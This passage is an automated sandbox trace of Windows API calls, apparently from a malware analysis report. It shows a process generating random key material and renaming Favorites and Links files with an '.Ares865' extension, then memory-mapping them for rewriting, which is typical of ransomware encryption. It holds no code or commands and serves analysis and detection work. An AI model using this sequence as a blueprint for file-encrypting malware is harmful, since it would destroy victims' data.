[0106.834] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.834] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.835] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.Ares865") returned 75 [0106.835] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.ares865"), dwFlags=0x1) returned 1 [0106.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.838] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.838] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.839] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.839] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.839] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.839] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.839] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.839] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.843] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.844] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.845] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.845] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.845] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.846] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.Ares865") returned 68 [0106.846] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.ares865"), dwFlags=0x1) returned 1 [0106.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.847] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.847] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.847] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.847] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.848] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.848] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.848] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.848] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.851] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.852] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.853] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.853] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.853] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.854] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.Ares865") returned 75 [0106.854] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.ares865"), dwFlags=0x1) returned 1 [0106.857] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.857] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.857] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.857] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.857] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.858] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.858] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.858] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.858] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.864] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.865] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.866] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.866] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.867] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0106.867] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.Ares865") returned 85 [0106.867] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.ares865"), dwFlags=0x1) returned 1 [0106.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.868] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.869] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.869] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.869] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.870] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.873] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.876] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.880] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.880] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.880] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.883] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.Ares865") returned 95 [0106.883] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.ares865"), dwFlags=0x1) returned 1 [0106.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.889] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.889] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.890] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.890] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.890] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.894] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.895] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.896] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.896] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.896] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.897] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.Ares865") returned 88 [0106.897] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.ares865"), dwFlags=0x1) returned 1 [0106.898] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.898] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.898] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.899] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.899] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.899] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.899] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.899] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.900] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.904] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.907] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.910] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.910] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.912] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.Ares865") returned 88 [0106.912] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.ares865"), dwFlags=0x1) returned 1 [0106.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.920] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0106.920] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.921] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.921] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.921] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.927] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.927] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.929] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.932] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.933] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.935] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.935] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.935] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.936] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.Ares865") returned 86 [0106.936] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.ares865"), dwFlags=0x1) returned 1 [0106.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.937] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=134) returned 1 [0106.937] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.938] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.938] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.938] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.939] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x124 [0106.942] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x190000 [0106.943] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.944] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.944] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.944] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.944] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links" [0106.945] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.Ares865") returned 65 [0106.945] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0106.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.946] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=80) returned 1 [0106.946] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.947] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.947] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.947] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.947] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.948] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.948] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x124 [0106.949] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0106.950] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.951] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.951] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.951] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0106.951] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.Ares865") returned 73 [0106.951] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.ares865"), dwFlags=0x1) returned 1 [0106.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.953] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=236) returned 1 [0106.953] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.953] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, 